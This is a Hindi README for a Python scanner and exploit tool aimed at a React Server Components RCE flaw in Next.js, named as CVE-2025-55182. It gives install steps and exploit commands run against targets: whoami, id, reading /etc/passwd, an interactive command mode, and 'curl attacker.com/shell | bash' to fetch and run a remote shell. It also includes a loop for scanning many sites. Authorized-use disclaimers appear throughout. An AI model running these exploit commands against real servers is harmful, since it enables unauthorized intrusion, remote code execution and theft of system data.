
Next.js अनुप्रयोगों में **React Server Components (RSC)** कमज़ोरियों का पता लगाने और उनका शोषण करने हेतु Python-आधारित सुरक्षा स्कैनर। यह उपकरण निष्क्रिय पहचान, सक्रिय फ़िंगरप्रिंटिंग और RCE शोषण परीक्षण करता है।
Next.js अनुप्रयोगों में React Server Components (RSC) भेद्यताओं का पता लगाने और उनका शोषण करने के लिए एक Python-आधारित सुरक्षा स्कैनर। यह उपकरण निष्क्रिय पहचान, सक्रिय फिंगरप्रिंटिंग और RCE शोषण परीक्षण करता है।
⚠️ चेतावनी: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर प्रणालियों तक अनधिकृत पहुँच अवैध है। परीक्षण से पहले हमेशा लिखित अनुमति प्राप्त करें।
✅ निष्क्रिय पहचान - RSC संकेतकों के लिए HTML, हेडर और पृष्ठ संरचना का विश्लेषण करता है
✅ सक्रिय फिंगरप्रिंटिंग - सर्वर प्रतिक्रियाओं का पता लगाने के लिए RSC-विशिष्ट हेडर भेजता है
✅ HTTP हेडर विश्लेषण - Next.js और RSC-संबंधित हेडर की पहचान करता है
✅ RCE शोषण - कमजोर सर्वरों पर कमांड निष्पादित करता है (यदि शोषण योग्य हो)
✅ रंगीन टर्मिनल आउटपुट - बेहतर पठनीयता के लिए उन्नत दृश्य प्रतिक्रिया
✅ इंटरैक्टिव मोड - शोषण मोड में कई कमांड निष्पादित करें
✅ मजबूत डिकोडिंग - gzip-संपीड़ित और बाइनरी पेलोड को संभालता है
रिपॉजिटरी क्लोन करें
git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
cd CVE-2025-55182
निर्भरताएँ स्थापित करें
pip install -r requirements.txt
आवश्यक पैकेज:
requests>=2.28.0 - HTTP क्लाइंट लाइब्रेरीurllib3>=1.26.0 - उन्नत HTTP उपयोगिताएँcolorama>=0.4.6 - टर्मिनल रंग (Windows संगत)beautifulsoup4 - HTML पार्सिंगpython rsc_detector.py https://example.com
python rsc_detector.py https://example.com --exploit
python rsc_detector.py https://example.com --exploit --cmd "whoami"
python rsc_detector.py https://example.com --exploit
फिर प्रॉम्प्ट पर कमांड दर्ज करें (बाहर निकलने के लिए quit टाइप करें)।
| विकल्प | विवरण |
|---|---|
<URL> | लक्ष्य URL (आवश्यक)। अनुपस्थित होने पर स्वतः https:// जोड़ता है |
--exploit | पहचान के बाद RCE शोषण सक्षम करें |
RSC भेद्यता का पता लगाएं:
python rsc_detector.py https://target.com
शोषण करें और id कमांड चलाएं:
python rsc_detector.py https://target.com --exploit --cmd "id"
शोषण करें और cat /etc/passwd चलाएं:
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"
इंटरैक्टिव मोड (एकाधिक कमांड):
python rsc_detector.py https://target.com --exploit
window.__next_f मार्कर की जाँच करता है (Next.js App Router)text/x-component Content-Type का पता लगाता है__NEXT_DATA__ और Next.js इम्पोर्ट्स का विश्लेषण करता हैServer, Vary, और X-Nextjs-Cache हेडर की जाँच करता हैRSC: 1 हेडर के साथ अनुरोध भेजता है[*] Starting RSC Detection Scan on: https://example.com
====================================================================
[1] Running Passive Scan...
Status: DETECTED
Score: 80/100
- Found: window.__next_f (App Router)
[2] Analyzing Headers...
- Vary header includes RSC: ...
[3] Running Active Fingerprint...
Status: DETECTED
- Response Content-Type became text/x-component
- Vary header contains 'RSC'
====================================================================
[FINAL RESULT] VULNERABLE
[!] This application appears to be vulnerable to RSC-based attacks!
Consider: RCE exploitation may be possible
[*] Executing command: whoami
[+] Command executed successfully!
[OUTPUT]
root
CVE-2025-55182 शोषण:
child_process.execSync() के माध्यम से कमांड इंजेक्शनयह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए सख्ती से है:
अनधिकृत कंप्यूटर पहुँच अवैध है इनके अंतर्गत:
यदि आप इस उपकरण का उपयोग करके कोई भेद्यता खोजते हैं:
उपकरण डिफ़ॉल्ट रूप से SSL सत्यापन को अनदेखा करता है। सत्यापन सक्षम करने के लिए:
detector = RSCDetector(url, verify_ssl=True)
उपकरण स्वचालित रूप से:
कोड में टाइमआउट बढ़ाएं:
response = self.session.get(self.url, timeout=30) # 30 seconds
CVE-2025-55182/
├── README.md # This file
├── requirements.txt # Python dependencies
├── rsc_detector.py # Main scanner & exploit engine
├── rsc_cli.py # CLI utilities (if present)
├── script.py # Additional scripts (if present)
├── COLOR_GUIDE.md # Color output documentation
└── .gitignore # Git ignore rules
requests>=2.28.0 # HTTP requests
urllib3>=1.26.0 # Advanced HTTP
beautifulsoup4>=4.11.0 # HTML parsing
colorama>=0.4.6 # Terminal colors (Windows)
सभी एक साथ स्थापित करें:
pip install -r requirements.txt
--exploit फ्लैग छोड़ेंpython rsc_detector.py https://target.com --exploit --cmd "curl attacker.com/shell | bash"
python rsc_detector.py https://target.com > scan_results.txt 2>&1
for url in https://site1.com https://site2.com; do
python rsc_detector.py "$url"
done
कोई बग मिला या सुधार का विचार है? योगदान का स्वागत है!
git checkout -b feature/improvement)git commit -am 'Add feature')git push origin feature/improvement)THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
THE AUTHORS ASSUME NO LIABILITY FOR MISUSE OR UNAUTHORIZED ACCESS.
USE AT YOUR OWN RISK AND ONLY WITH PROPER AUTHORIZATION.
यह प्रोजेक्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
सुरक्षा अनुसंधान और अधिकृत पैठ परीक्षण के लिए बनाया गया।
अंतिम अपडेट: 19 दिसंबर, 2025
याद रखें: महान शक्ति के साथ महान जिम्मेदारी आती है। इस उपकरण का उपयोग नैतिक और कानूनी रूप से करें।
--cmd <command> | एक विशिष्ट कमांड निष्पादित करें (--exploit के साथ उपयोग करें) |